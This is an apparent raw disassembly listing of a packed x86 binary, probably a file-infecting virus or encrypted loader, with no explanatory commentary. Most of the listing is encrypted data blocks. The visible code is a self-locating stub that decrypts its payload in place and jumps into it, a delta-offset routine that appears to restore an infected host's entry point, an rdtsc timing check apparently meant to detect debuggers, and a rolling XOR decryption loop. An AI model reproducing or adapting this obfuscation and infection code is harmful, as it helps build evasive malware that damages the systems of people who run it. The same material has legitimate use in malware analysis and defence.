dd 5D2F5AAEh, 0C986D295h, 4035F909h, 5B1802BEh, 6360AE71h dd 975A555Dh, 10D3A061h, 71D78A4Dh, 903E7D47h, 0DFAF4425h dd 176265FBh, 5D76ADECh, 0FEB4C294h, 94E8FA05h, 0FBF836F9h dd 0CCE229D1h, 0AB5B28F1h, 7B8E1107h, 9A2F138h, 42087E38h dd 0DF242DB1h, 0BFE6E4EEh, 48405BACh, 50447D82h, 53B26E82h dd 0FCEC9AB4h, 57BC9CE8h, 602EF434h, 4B10D4Ch, 775FF044h dd 0B2384A72h, 0F4E56939h, 27D31AACh, 0DAC8BE2h, 0FFFBC332h dd 3FB43ACBh, 9B7B0AA5h, 24DDAD25h, 535316D9h, 8FACC546h dd 466B434Ch, 0E7D3F283h, 0CCEAD576h, 5265BBA1h, 4A7CB4ADh dd 55E2A9h, 0C1FC225h, 183ADE43h, 0FB33EB61h, 31CE199Ch dd 86DE0Ch, 0A78A7149h, 0E7AB3C72h, 236051A0h, 0ED90DDE6h dd 87C9035Ah, 475DBA0Eh, 0FB52CD0Ah, 0AF2D73AAh, 6BA80159h dd 0CB1C332Eh, 0F83030F6h, 8FCC09A9h, 3074BA90h, 5D9FD1EEh dd 7FF02D6Ah, 0BE2E2E52h, 24824582h, 0D7175499h, 0E2FE4A9Ah dd 94DC69A6h, 0FB3874A1h, 0EE53AC72h, 4AF7235h, 1F5C994Ah dd 0D4975AF5h, 250A1311h, 0BC49713Ch, 0B070ED10h, 96984EEDh dd 0A7DBAB6Ah, 52B12E3h, 0BEC260EBh, 0F138A0F0h, 682BED75h dd 5F23BC2Eh, 6B92B047h, 0C1088FDDh, 38FBBD35h, 2CF9F182h dd 2FE3A649h, 14D43DD8h, 54887851h, 613B8D47h, 7BB3763Ah dd 449A626Eh, 0D73BFE81h, 0CC8CDD91h, 0E0A37B09h, 30781ADDh dd 0A86B2D75h, 63A19B0Dh, 0E9D11926h, 7470ACEh, 4E043A64h dd 2EA4F2B5h, 70696DA1h, 50641BB6h, 4DE00EA2h, 76760A86h dd 0B8763F69h, 27E79C52h, 1863922Bh, 5DCF9355h, 0FF242CA1h dd 7D224AC2h, 59AB5809h, 562A5205h, 0BA936021h, 9C4EB42Dh dd 28932A79h, 2990CD12h, 62F7293Bh, 166F80Eh, 887D365Ah dd 0F9C8E72Eh, 7005CE32h, 6527EAADh, 0DDECFCD5h, 4C39EA1Eh dd 4003C68Ah, 9176B608h, 28DD96FAh, 0E7205D9Ah, 9D529CB2h dd 4F1B2C6h, 0F0BB7E41h, 0ECAF745Dh, 0E6CB3F29h, 8C975A1Dh dd 376C0CF9h, 3FFAC8FAh, 367300C1h, 9CE40069h, 1DD31ED7h dd 8C792A56h, 5B4E62Bh, 7401C236h, 682BEEB9h, 0E19FEBD0h dd 5025EE1Ch, 0B3C2BE8Ch, 0EC33504h, 2CEFB275h, 0A0F8D261h dd 22EF19E0h, 0B8BF8B51h, 0C43B3FC5h, 84B6760Fh, 611AEA8Ah dd 0DD9B6819h, 4978CC61h, 0C0B57E82h, 34773AFDh, 15EB2785h dd 9C691A66h, 13DA61DBh, 0B278C268h, 7FD3FEC1h, 84D00D46h dd 9FDC1BC8h, 5415AA75h, 0CC964591h, 3FFFF4BAh, 6CC3EE4h dd 0D89E426Dh, 9CD4619Eh, 0CCF9005h, 3F4333C2h, 0AA3C7A0Bh dd 756D0Dh, 23609F5Fh, 0D2A9D416h, 8E064A0Dh, 0B87B5E25h dd 0FE91B915h, 0B41925BFh, 634760DEh, 0BE738554h, 7C3F02C5h dd 0F92783A9h, 52182610h, 0C0AE53A1h, 0C70FE4ADh, 7613AE04h dd 6353497Dh, 28E188C8h, 1C6A2F65h, 0E3D3A049h, 0E7C73BE8h dd 0F1F8D43h, 0DA97F9B0h, 0E0A36629h, 7A13550Dh, 378B4E11h dd 0A976A76h, 3B8CC917h, 92589678h, 97899BE1h, 8C4F8A51h dd 0F68DC9h, 0FF37CC82h, 22AAFEFBh, 5C1F8281h, 5859FD79h dd 8D34C8FEh, 3EFCC82h, 1AFFDAF8h, 486E2D69h, 66D7AC4Dh dd 2CF70507h, 0ECD727C6h, 73B3760Fh, 0E4A7028Ah, 0A2105E21h dd 0C4C5531Dh, 3704B10Ah, 8BE3BF76h, 2D9C2EC7h, 9C691A6Eh dd 90531699h, 9CB008B9h, 51378CC2h, 0A49A7B85h, 0EB23D096h dd 6416F2EEh, 70804B66h, 3CBFC2B3h, 3287B679h, 0CCB6B29Ah dd 0E7246228h, 0FC3790Ch, 72E8AE3Ah, 7E12B31h, 65F23195h dd 0EAA7FA90h, 1C2EDF19h, 37877C32h, 0B72561A5h, 2BE2A0C4h dd 0A063263Dh, 0ACDE8FE7h, 8E3E0EE7h, 2A47D0ACh, 20BBE48Dh dd 0BE9C025Dh, 0D341215Eh, 60CDEDFh, 0CB863199h, 34F78C45h dd 0A5FBAE71h, 0FAAA724h, 2F1B1BD0h, 81C48A7Bh, 0F88D6E29h dd 0ECC7D5B6h, 0CBA36629h, 531E725Eh, 0C88B4E42h, 8037C7F2h dd 0B07236CFh, 0A3132AEDh, 38535D26h, 7BEFB275h, 0B67B8D4Ch dd 7437FABDh, 3A2C9A31h, 0A3E8984Dh, 0DD988C66h, 4431F545h dd 7372BB62h, 0A7E2595Dh, 16DC62E4h, 0FFD5795Dh, 20800552h dd 0C43407B2h, 0F0B0760Fh, 0F0D36A2Dh, 0E757DBAAh, 418C5223h dd 0C0B579B1h, 8BC3BFFEh, 0A06A2EC7h, 174F686Eh, 0A66C925Ch dd 8C0D33CDh, 32B2FDB2h, 7C6DF3BDh, 607B852Ah, 6B9B5F16h dd 0D063CEA7h, 3DFFC2ADh, 31AABE3Bh, 0B16DFA2Eh, 18EDA6E8h dd 344417A2h, 0C3867Fh, 0F2C36A3Dh, 0F8C3E332h, 0DC296213h dd 0E818D3EEh, 0C4874A3Bh, 0AC0E3E03h, 2998F40Bh, 0A0551E62h dd 94531ADDh, 3DC108A4h, 7C093A4Fh, 48B8734Eh, 2427EA9Bh dd 536EDEA1h, 8E0DD51Fh, 0A2D5C423h, 0BEFE518Ah, 82299C76h dd 0EB3D7467h, 9BB7446Ah, 648EE6Fh, 9C06FD19h, 0ECAF440Ah dd 1A7DE226h, 6168A5E2h, 0C8BD7191h, 87C5D7FAh, 58C36CFh dd 0A4511591h, 0A3758B1Eh, 1C212E3h, 807539A1h, 4B476F30h dd 3A7AEE87h, 0E9E0E2CFh, 5025E9FDh, 7FA95F72h, 8D04BEB7h dd 2CD98D11h, 1BCD3396h, 0A15A9A6Bh, 8FDB001h, 0C3DF37BAh dd 0FE5760Fh, 0D29CC0B8h, 0BC3EDD21h, 0CC8F642Ah, 0C083AECAh dd 0DE2A3AFDh, 3E86AFF0h, 0C45F14D2h, 15921929h, 84711FB9h dd 0FBF83E44h, 63DF0D7Dh, 75576368h, 69D4DAABh, 4821CE81h dd 0BD99DEF0h, 5CFF9205h, 44F4DF1Ch, 0E7245A89h, 0E4CAE7AAh dd 0FF3C7C9Dh, 0B48A8D5h, 17850FCEh, 0E8C91A08h, 0D0B6EE0Bh dd 2CE74A0Dh, 4784C1A4h, 0E8E40B80h, 15EE16CDh, 9461248Dh dd 0EE435E5Ah, 7E393844h, 1865D3CAh, 64D8EAADh, 58711A2Ah dd 0D9F082C7h, 4035FD73h, 0B5FF7EFEh, 17D4F24Fh, 9FDCD739h dd 913B929Fh, 0EC3875B7h, 744813Eh, 9817B154h, 0BA36629h dd 0D4B8E2ACh, 0D5634E11h, 7E7F4205h, 80CB36D9h, 4C672AEDh dd 985B1EF1h, 344F3617h, 8043074Ch, 7437F955h, 68072CB1h dd 503BB628h, 0A890F854h, 241EB68Dh, 38FBBE69h, 8BB3975h dd 3A68FB59h, 2CBA77DCh, 0DC238E67h, 9D407DA4h, 0F1B372FBh dd 0E6A46C28h, 68C44926h, 0FFC3012Ch, 42808C15h, 498D31h dd 1CEh dup(0) dd 77E7EB69h, 3144C8D5h, 3143A001h, 13EEh dup(0) db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame public start start proc near push ebp mov ebp, esp cld sub edx, edx sub ecx, ecx mov cl, 0E4h loc_3144A00B: ; CODE XREF: start+Cj inc edx dec ecx jnz short loc_3144A00B call sub_3144A03A add esi, 29h sub edi, edi or edi, 2898h push esi loc_3144A023: ; CODE XREF: start+33j mov al, [esi] sub ax, dx cld cld cld cld xchg al, [esi] cld inc esi dec edi cmp edi, 0 ja short loc_3144A023 pop esi leave jmp esi start endp ; =============== S U B R O U T I N E ======================================= sub_3144A03A proc near ; CODE XREF: start+Ep pop esi push esi retn sub_3144A03A endp ; --------------------------------------------------------------------------- call $+5 mov eax, [esp] cld mov [eax+2FCBh], ebx test dword ptr [eax+2886h], 80000000h mov ebx, [esp+4] jz short loc_3144A089 pop ecx mov [eax+2FCFh], esi push edi pop dword ptr [eax+2FD3h] cmp byte ptr [eax+288Ah], 0E8h jnz short loc_3144A080 add ebx, [eax+288Bh] mov ebx, [ebx+2] push dword ptr [ebx] jmp short loc_3144A088 ; --------------------------------------------------------------------------- loc_3144A080: ; CODE XREF: .gda_:3144A071j mov ebx, [eax+288Ch] push dword ptr [ebx] loc_3144A088: ; CODE XREF: .gda_:3144A07Ej pop ebx loc_3144A089: ; CODE XREF: .gda_:3144A05Aj push ebp mov ebp, eax sub dword ptr [esp+4], 10041h sub ebp, 361005h mov edi, [esp+4] lea esi, [ebp+363898h] mov ecx, 0 rep movsb call sub_3144A0FE mov ecx, eax call sub_3144A0FE sub eax, ecx jz short loc_3144A0D2 cmp eax, 100h ja short loc_3144A0D2 lea eax, [ebp+3610D4h] mov dl, [eax-10h] call sub_3144A102 jmp short loc_3144A111 ; --------------------------------------------------------------------------- loc_3144A0D2: ; CODE XREF: .gda_:3144A0B9j ; .gda_:3144A0C0j test dword ptr [ebp+36388Bh], 80000000h jz short loc_3144A0FC lea esi, [ebp+36388Fh] mov edi, [esp+4] movsb movsd mov esi, [ebp+363FD4h] mov edi, [ebp+363FD8h] mov ebx, [ebp+363FD0h] loc_3144A0FC: ; CODE XREF: .gda_:3144A0DCj pop ebp retn ; =============== S U B R O U T I N E ======================================= sub_3144A0FE proc near ; CODE XREF: .gda_:3144A0ABp ; .gda_:3144A0B2p rdtsc retn sub_3144A0FE endp ; --------------------------------------------------------------------------- db 0EAh ; =============== S U B R O U T I N E ======================================= sub_3144A102 proc near ; CODE XREF: .gda_:3144A0CBp mov dh, dl mov ecx, 27B7h loc_3144A109: ; CODE XREF: sub_3144A102+Cj xor [eax], dl inc eax add dl, dh loop loc_3144A109 retn sub_3144A102 endp ; --------------------------------------------------------------------------- loc_3144A111: ; CODE XREF: .gda_:3144A0D0j imul esi, [edi], -42h pop eax insd and edi, 2Bh jz short loc_3144A18B xchg ax, cx xchg eax, ecx mov eax, 746121BEh pop edi dec eax xor ch, [ecx-17h] jnp short near ptr loc_3144A140+3 mov ebp, 6EEDE4A4h adc [edi+61h], ch adc ah, [ebx-7Eh] les esp, [ebp+6E16F143h] mov bl, 68h loc_3144A13E: ; CODE XREF: .gda_:3144A19Dj adc al, 0F5h loc_3144A140: ; CODE XREF: .gda_:3144A128j adc ebx, [ebx+144B9D19h] fnstsw word ptr [esi] xor ch, [esi+54h] wait rol dword ptr [ebx-2Ch], 1 xchg eax, ebx out dx, eax or ds:1E175C5Ah, edx ; CODE XREF: .gda_:3144A19Bj or al, 89h out 67h, eax cmpsd jz short loc_3144A1A4 mov dword ptr [esp+eax+53h], 5C72DF7h cwde enter 20FBh, 58h sub eax, 51D889E3h retn ; --------------------------------------------------------------------------- db 59h, 7Ch, 72h dd 653C5268h, 0AB97957Ch, 12E2C3F0h, 4D342F0Ch, 435524F7h db 9Eh, 0A1h, 0B2h ; --------------------------------------------------------------------------- loc_3144A18B: ; CODE XREF: .gda_:3144A119j outsb mov al, 4Fh sub al, 16h add [ecx-1936245Ah], ch sbb [ebx], esp db 26h pop edi dec edx jp short near ptr loc_3144A151+5 loop loc_3144A13E dec ecx jbe short near ptr loc_3144A1A4+1 icebp insb loc_3144A1A4: ; CODE XREF: .gda_:3144A15Cj ; .gda_:3144A1A0j jnb short near ptr loc_3144A1A9+1 sbb al, 0EEh std loc_3144A1A9: ; CODE XREF: .gda_:loc_3144A1A4j fcmovb st, st(4) scasb ; --------------------------------------------------------------------------- dd 1A18E7DFh, 0BB605921h, 0D4D3A09Ah, 989B2990h, 0CD3AA7B1h dd 5D5CCAD6h, 0C35C728Bh, 0ED8015F0h, 0C6533D27h, 562FF7Fh dd 2679121Eh, 8D253FDFh, 8BCC6278h, 0DEC21F0Dh, 7988C7C9h dd 187B8AC5h, 0FB61FC18h, 0F1949CD5h, 1029D6EDh, 4DE31110h dd 4099261Dh, 0BBB74A60h, 0C6EAE77Ch, 162119B0h, 162C744Dh dd 0ABA84F83h, 317C929Eh, 1CF6BF96h, 3FCDE2CEh, 684FB015h dd 0F6A9BF48h, 9DC4ECE5h, 10D10F51h, 4F141C7Bh, 0A5373AC8h dd 0B13B7A90h, 0C037A4ADh, 815C0BE0h, 4688F687h, 0A98F1A30h dd 95ECA8CCh, 2E540243h, 63751A28h, 8E9281EEh, 36239210h dd 21F46020h, 0B0A70C5Dh, 2184DF70h, 0D6EEEC9Ch, 0CB193DC0h dd 260A4268h, 325D159Bh, 0F78CA2B3h, 28244A8Dh, 94497F08h dd 9D84ACA2h, 95CEBDFDh, 425FCAECh, 0A64F9AC2h, 37B1B709h dd 45CCD4E3h, 0D788010Bh, 41E2221Fh, 0ADAC8DECh, 0A96C8398h dd 0C82F14D5h, 867851E8h, 0CA6BBA15h, 0F60C20A7h, 0F4B4A077h dd 425C1A89h, 0EE6C9A30h, 69ACC3D8h, 86F5415h, 0E93C9728h dd 8EA63854h, 664C0878h, 0DAF40A48h, 479CD8C8h, 44135698h dd 0D7845219h, 8194ABC0h, 10076CFDh, 0CEEE9210h, 0E373A2B9h dd 1E02715Eh, 0C6DCF7E0h, 6CD573B0h, 16464258h, 0D4DE0959h dd 0D4E96DA2h, 0E5240C6Bh, 0B4F2109h, 5E42B1FEh, 32983D48h dd 46C4DAF2h, 566C829Eh, 0B2507E0Eh, 3343D2A4h, 4E5241EAh dd 0E1C697B5h, 5787CAD6h, 7D9ACF05h, 0E0B51A06h, 94DF2A4Bh dd 83D76A80h, 0E6CA29D2h, 8E20B5D0h, 0BD4C627Ah, 0E8CFC0A5h dd 87EC4DC8h, 19A6DFFFh, 5367022Eh, 7EA29122h, 0A93D2297h dd 0F8DCD595h, 0B80929B8h, 0E1347C5Bh, 4353F378h, 6EB2A286h dd 2DFECFD3h, 0A437EA36h, 0E97DE357h, 381C79D5h, 6C4169F8h dd 0BD74BC9Bh, 76DCD41h, 96945F7Fh, 0EE8482AEh, 73142A41h dd 90808255h, 24ABF190h, 9D5D438h, 7F37CE90h, 451C188Bh dd 0EE6E4DC9h, 2321DAB2h, 3E627F57h, 0E6FC0B91h, 0C3A037D0h dd 0C9B39D86h, 0DA79A146h, 869CB285h, 0A3EF3C70h, 0E447065Fh dd 82012724h, 8A3C6452h, 0A8E67376h, 744E2113h, 0CABFBF82h dd 36B4F262h, 0E5849ADFh, 9D2C2894h, 0D6D480C4h, 6E7C92A8h dd 5C757A3Ah, 499CEC92h, 684F5C35h, 0C29F6A48h, 0C134B2B0h dd 82E78298h, 329F2A2Ah, 0A6D69282h, 243678FAh, 99FC4A38h dd 9EDECAE0h, 16A318D9h, 0D5DA8FCFh, 0CFF3C2EEh, 0BA5B9505h dd 0E6FC132Fh, 9EA40F5Dh, 0CAF5624Eh, 55F40A2Bh, 7394127h dd 18545A9Dh, 0EE698F18h, 81949CD4h, 4C680288h, 311B9030h dd 40B7442Dh, 41F4CF60h, 8B34C67Dh, 86849AB1h, 162C4249h dd 0DB908F53h, 361BE7CAh, 67525322h, 0D3AB8794h, 109CDDA0h dd 0F91C324Dh, 98FB8E45h, 3CF97D98h, 0A9141C7Bh, 9D924717h dd 4E0E7AA6h, 63F32052h, 9E82F1BEh, 465D5A31h, 0F2F8D30h dd 0C288CE51h, 9CC195D7h, 0D5FC2413h, 0B0013926h, 364C5444h dd 4B0B5D74h, 86AA896Eh, 48309AF5h, 0D212815Eh, 0A6B44B2h dd 26565A4Ch, 5B1BD07Ah, 76BA9926h, 0C2408AE5h, 0C35A1A9Bh dd 0A7B79AB0h, 2F16A1C9h, 88E8D485h, 0E74EE7A8h, 6D001E2Ch dd 0C2BF908Bh, 0CAB50B88h, 561C3246h, 0FF928AA4h, 0A93FD2C8h dd 0C82F7CD5h, 0FF7C57E8h, 3A9B75E4h, 73832A1Ch, 9E82F6DEh dd 0B9A1B760h, 7BFB49CFh, 969AF9F6h, 0FAD5E46Bh, 0E6FC1300h dd 0A0314587h, 0C94C5443h, 0E8CF24B5h, 7DF45BC8h, 7444A58Fh dd 0D6860272h, 7EFEAAAAh, 223C5300h, 0A4207110h, 7AE6F2B8h dd 0FCCB8EEBh, 0F2838A5Eh, 0A7B79AB0h, 0E9D398B0h, 0F94167FFh dd 347CA4BDh, 0F1746B01h, 80F7D06Dh, 7EB009A0h, 5E446A8Bh dd 0AEEB2AF0h, 5662DD98h, 0FE142B40h, 0A6BCD2E8h, 4E647A90h dd 0F624A938h, 9EB4CAE0h, 150A2388h, 0D53E8FCFh, 0CF07C2EEh dd 4B94EE2Ch, 2512F0D3h, 97D52F5Dh, 0C91E624Eh, 0E8CF98B5h dd 0D2193BC8h, 0C6446C4Fh, 0D6EC020Eh, 15FBC58Ch, 546C221Dh dd 0A28D8C79h, 20E9C5DDh, 7B412601h, 398CF249h, 58BFA025h dd 4EA9CB58h, 7DD4DC3Fh, 151DD0F4h, 63457435h, 0D483869Dh dd 2A17EFCAh, 724A6E3Bh, 0DAA7BFA3h, 221FEE98h, 90714632h dd 0C3CE91E8h, 8010EF1h, 0B7694E51h, 0FBC689E0h, 3906E9h dd 0A3617659h, 0FFDCB2B9h, 3E150DEEh, 8799606Bh, 0FCF4DFA4h dd 45290117h, 9DF44B53h, 0F2FDD7BAh, 43210815h, 82897677h dd 1FF1D8A8h, 547F520Ch, 0AB909B75h, 13FECAECh, 5D342E01h dd 0B2BD977Ah, 1EBCED5h, 7A492A34h, 0EDE6D970h, 150CF3C6h dd 0E505538h, 0C2A59ABDh, 3B06E2F4h, 401C5629h, 0FAA1B699h dd 209EFF1h, 8D6D792Fh, 0F2D1B79Ch, 4E0117F9h, 9369507Eh dd 0ECD6A3ACh, 462500E9h, 0A8707F77h, 0D7C9AEB1h, 57261EF4h dd 8388674Ah, 0C9A4FBA3h, 5F0A161Dh, 0B7A76F4Ch, 0C19CD7B2h dd 47022E15h, 0BFB86774h, 3994CFADh, 4971260Dh, 0AB888F74h dd 12E2C3F0h, 1E752F0Ch, 92A8974Fh, 28F4F7D5h, 58492E31h dd 0FFB18761h, 1219D5A8h, 7E495F04h, 0DEB883A8h, 3B338AE1h dd 7479643Ch, 0C0ABB383h, 2209C598h, 8D664F16h, 0E3D2BD81h dd 9643BE8h, 995A565Dh, 0FBD9BF8Ch, 293A1CC1h, 9A657742h dd 0D7C2ADB1h, 5F3B2680h, 84955E4Ch, 0F7D6DBA2h, 57016239h dd 0BB9D5C50h, 0C0FAFDBFh, 2E213619h, 0B8897257h, 1BF8C386h dd 564C3325h, 8F839479h, 13FCEDB8h, 71461A0Eh, 0B5AF976Bh dd 1F6CAB0h, 655F273Bh, 0D792D833h, 6608E1DAh, 6D4B4800h dd 85BF919Dh, 2611C492h, 634F323Ch, 0C2AD9C84h, 2218C3FDh dd 8B764332h, 0E7CFB79Ch, 3A012990h, 93604B7Eh, 0FBD9A3B4h dd 23302188h, 0BD046A55h, 0F3D8B1A1h, 533D3EEDh, 0A093464Dh dd 0DAC1D6B9h, 36290F11h, 0BF996475h, 0E3F5E4B8h, 68221507h dd 0D6896E71h, 0AE6C396h, 6750331Dh, 0AD8B967Ch, 1FFEF5B8h dd 77722F14h, 88DC9764h, 4E0DBC4h, 4658312Dh, 0D7A28372h dd 31BF7C4h, 654B6E23h, 0F8CC8C9Dh, 3B06C9D4h, 40794629h dd 0AEA1B699h, 242FF6D6h, 9B604B25h, 0C5D3A0B8h, 4E1709F5h dd 844F5676h, 0FBC0AB85h, 253300D8h, 0AB776955h, 0E2E2C2A0h dd 5F3118C3h, 83AF775Ch, 0E1CDCEB3h, 42026216h, 0BF917863h dd 0F5C9D7BCh, 5C142815h, 0A5896177h, 0ADAAAB3h, 704C3325h dd 81939F79h, 15E9F1DEh, 705B2314h, 89A8BC08h, 28EAFFC0h dd 16492E31h, 0CE9B9E4Eh, 142CFCCDh, 7D41593Fh, 0DDA3B68Bh dd 1074E4C5h, 636C7D3Ch, 0CDA1899Eh, 3803EBECh, 0AE606440h dd 0C3C8BD9Ah, 27320EF3h, 9779564Ah, 0F3D1878Ch, 462500E7h dd 9B556E7Eh, 0DFD5B0BDh, 4C3B0CEEh, 8F887345h, 0E1F0D4BFh dd 36220713h, 0ACA37E6Eh, 0D0F9C6A1h, 5B302819h, 0B3A16E79h dd 7E6C5ADh, 4A480068h, 0AD8D9445h, 25E9C6D7h, 705D3814h dd 87B3A66Fh, 3DEDE9DEh, 7845302Ch, 0ED83EA67h, 708C1E9h dd 7E514E22h, 0D9A081F8h, 3107EFD3h, 7279592Bh, 0C0ABB9F0h dd 220FE7F6h, 8A714D40h, 0D2CFBD80h, 2F0A03F2h, 840C4755h dd 9EC2A985h, 223217FBh, 8D6B6930h, 96D8A7B3h, 5B2004C9h dd 92997C5Ah, 0FDCBD693h, 582D2A1Dh, 0DE916644h, 0E3E8DC81h dd 5A213402h, 9598675Fh, 1BFAC4AFh, 4259260Bh, 0BA858E43h dd 18C5A2DDh, 70462F14h, 0B693866Dh, 6EC5F4D5h, 73582C11h dd 0CAB18472h, 819E2E7h, 4F484805h, 0C2A2ABF8h, 3B1AF8C5h dd 6779603Ch, 0C2AD9C94h dd 122D82FDh, 0B7446B16h, 0E292E0DBh, 1C6436DCh, 9A4F455Dh dd 0D5D1B98Fh, 145C0BEDh, 9E4B7D55h, 0F3E7ACBDh, 7F2C2FF9h dd 81994028h, 0FCC1CF81h, 5A2D3401h, 0A6B16F55h, 0E3CEB289h dd 5A210917h, 0A380634Eh, 3FECEFA5h, 0D00F0468h, 98B2F87Ah dd 77E67633h, 646B532h, 9E490D5Eh, 0E584AC8Fh, 407A149Ch dd 0CE2BBC50h, 0A0E96DB0h, 8D240C6Bh, 7492F23Ch, 17F98AA8h dd 57D419B3h, 0AEC4DA98h, 72200F70h, 94144043h, 0F5EC83EDh dd 82EF7FFAh, 0A6D8A968h, 0CFF4A0B4h, 0D3A321DAh, 0EE3221DEh dd 69A0065Bh, 86F9C15h, 0EE389128h, 72313713h, 54C5442h dd 8CF460E9h, 0B49C82A0h, 7F80D170h, 86AC6849h, 0FD8CC091h dd 4C685AA8h, 5B1BAA1Eh, 76BA9952h, 2D148EE3h, 0C91C77DAh dd 0B4735829h, 0D5EE6100h, 562BD957h, 99836D69h, 0E81BE5Fh dd 0DE9CE2F8h, 5E74E550h, 676E6C3h, 0EEAE167Bh, 466C82F0h dd 0AC164040h, 56D4D282h, 24647AFFh, 0A65F7338h, 0A56A5F1Fh dd 1F0372BEh, 0D52A8FCFh, 6929C2EEh, 0B3DF1BF4h, 0E6CA0754h dd 1B29B633h, 367A7278h, 8DA3DB23h, 3176037h, 2E7261BAh dd 0F10D8D95h, 557CAAC0h, 0ADC3AD97h, 0F8DF1895h, 58032FB8h dd 0F6344A48h, 39230D12h, 554A1F3Bh, 99A1426Eh, 0BED4C235h dd 99839B40h, 0DCA1B1AFh, 33CCD4C3h, 0D354FE60h, 63470C7h dd 503032F0h, 0D3E77D67h, 0FE22119Ah, 0ADC8126Dh, 662BF51Dh dd 29E42238h, 154B351Eh, 139F2D4Fh, 0EE041AD8h, 7B2D9FD8h dd 3E627190h, 6371DB1Bh, 8E92A444h, 671D3629h, 21A55B70h dd 0B0A7E85Dh, 0A40DD70h, 0EDC297E7h, 0BCC9AAF6h, 0CE69526Ch dd 0CEE4FA10h, 496123E5h, 74347C7Bh, 0CC497FF7h, 3E84ACABh dd 320C8F0Ah, 3DD4C000h, 0A11A9E6Ch, 383F6AD5h, 71EC2FF8h dd 686FD825h, 2C1C1648h, 0C40787F0h, 5F84DA82h, 73142A40h dd 5816B3AAh, 8D940F59h, 0CA44B751h, 1AB1CAD6h, 0CF1E7A80h dd 0D83852A5h, 554E35D8h, 3E5482D5h, 67A11228h, 0B8BF233Dh dd 7AD1E978h, 5DF43C1Ch, 869496B4h, 2EFDDE7Fh, 3A6D0218h dd 7E94A8C8h, 27383A3Ch, 5B1BFA10h, 76BA993Ah, 9AB9B6EBh dd 0C6DDF62Ch, 6EEECAB0h, 162C46B0h, 0EC86BC00h, 0F383C5A8h dd 0E12012Eh, 21412BCBh, 5E748BA4h, 4766319h, 0C6C5B0A1h dd 166C8298h, 0B481D512h, 30BCE4D3h, 15108C15h, 0F2647668h dd 0C9B4CAE1h, 6678C677h, 11041A32h, 0A090E84Dh, 0FED13380h dd 0F21F045Ch, 0E4703180h, 611D3078h, 1C61F576h, 0DF9C84F3h dd 0FE319AF5h, 0F879FD4Eh, 0F3949CFBh, 716E163Fh, 43BCBE7Ah dd 768DA62Fh, 0DE07E160h, 3585E262h, 3ED4CA1Bh, 467C1208h dd 0EC411552h, 0E77CA493h, 0E263294h, 92B81DF8h, 44E175A8h dd 551C0474h, 92DE4F0Fh, 943182AEh, 0C0942A44h, 0E0BDA7E2h dd 5B1CF71Bh, 0EFEF220Eh, 8EB45F6Dh, 975F72BEh, 6AD6E566h dd 8924CD18h, 31546A81h, 0E6FD02ACh, 0B49A3AD0h, 0B60A720Dh dd 5AFB0A1Eh, 869CB3C9h, 5B6464F0h, 0E86D44E9h, 39DAE390h dd 0E9B7101Dh, 81E5BCD6h, 1CDD6C93h, 4D621B60h, 0FACE67F7h dd 55DD9A86h, 0C9A94D99h, 33D4EA00h, 50621A2Dh, 66245050h dd 0B6CCE2F4h, 0CB8BD9F0h, 62A0E5Ah, 0AEC4D6CDh, 0E9E98D98h dd 17142A40h, 0A6BCD259h, 1C344411h, 73037471h, 9EB4CA45h dd 0EA54B40Bh, 6A0B170Ch, 96ACC241h, 0CD214ABCh, 0E9C62E84h dd 8EA43655h, 1641CF78h, 0E3D42A00h, 0F2F9D5E9h, 12E82505h dd 57907738h, 16B455BEh, 5749261Ch, 0BEE78491h, 3A38D82h dd 0E1738C08h, 7CEDFD08h, 6E84BDA0h, 0E97EA0AFh, 88EF5895h dd 36BCA1A8h, 0E6746A00h, 0B6CCE2F1h, 3003E5E4h, 627D5D24h dd 8C5125F0h, 0D36CB4A4h, 0CD225E80h, 0EA395B21h, 1F644CACh dd 0F60E2250h, 0C8E59B60h, 60C98DD8h, 63042C0Ch, 0A0B7514Dh dd 0F7673A80h, 0B4AC437Ch, 1B5BEB81h, 367A5922h, 21D00EA7h dd 0B0A79C5Dh, 0AE87A270h, 0E0F96995h, 0BD6DABC0h, 27565302h dd 0BD1BC9EFh, 0F3995DBCh, 2D6E3EA0h, 750C79D3h, 52D499BBh dd 0B9BF7D5h, 45FEA36h, 667C93A4h, 0F2CB0DBh, 4ECFE2F8h dd 0D514418Bh, 67BAC183h, 4C83DF84h, 0D542696Dh, 75472587h dd 72378524h, 0E0E2EC0h, 9667069h, 0A55A5F1Fh, 0CBD772BEh dd 0EE322152h, 0BDA0065Bh, 39BDE94Fh, 0E69615EFh, 0C12DBA38h dd 791FA17Bh, 9FA35E66h, 0CBC0F79Ah, 41363919h, 0A28A6D6Bh dd 10FDFD9Ch, 554B3D0Ch, 0BC91B94Ch, 2E2C7CAh, 6D462F36h dd 9AB29D61h, 2F4E2F5h, 64493037h, 0CCB5BE00h, 2E08F7CFh dd 0E50493Fh, 0E6CCE2FAh, 5E748AA0h, 627F4021h, 0CBADA0DEh dd 3A1CACFEh, 0BD5D6440h, 0C1DBF2A3h, 2D0E1FF5h, 0A3064F5Bh dd 0BEE68FB3h, 0F1338FDh, 98223A7Eh, 0E3D8B0B1h, 3EBC3F8Ah dd 0BBFC1228h, 903E5751h, 0B38A624Eh, 0DEC21F4Bh, 94DC8h dd 0EF446C4Bh, 0EA981DF0h, 0CB1FB4AAh, 260A6956h, 0E0D85649h dd 0F7EA88CDh, 6B29B55Eh, 84617F2Bh, 0E584AC8Ch, 0B37B402Eh dd 3B594F66h, 664AA51Fh, 39F9BFDFh, 3F36E2CEh, 10F870E6h dd 7ADC9B6h, 0FE2F1512h, 0A997AA70h, 0DA68A9BFh, 0E2C9D6E0h dd 4E647278h, 0B54A7138h, 0D2F88ECEh, 0D4C98D88h, 0E5042C0Bh dd 5A1B618h, 0C10768EAh, 0D0C728BDh, 1D7445D0h, 0C9B2FC90h dd 0DEFFE2DFh, 0C0CFB2C8h, 7D0B0533h, 9AA04636h, 0EC0155C0h dd 0CE3C6453h, 311B0493h, 897AAB50h, 0CCB9B59Fh, 0F5DCC41Ah dd 82011779h, 472C7467h, 0EE85BB51h, 992DC3F9h, 381FB4C5h dd 0B6C70AF8h, 0D218AA0h, 342F600Dh, 0E2889EDEh, 0C4F97D98h dd 16141C7Bh, 0A6BCD2E2h, 3C1409E7h, 90784C51h, 61E4CAA1h dd 7067481Dh, 0AC819330h, 99ACF4E3h, 4FD9E7B1h, 6FFC2431h dd 0B898F255h, 0A3B33378h, 0DEC231B2h, 8698DA5Bh, 9BC95A70h dd 0D6DA1B66h, 50292799h, 0CE3C6454h, 311B0FD9h, 170965DEh dd 1E347C7Eh, 0A5797158h, 6E84ACAEh, 80DD7D5h, 0EA84EA36h dd 661693C2h, 0E265202h, 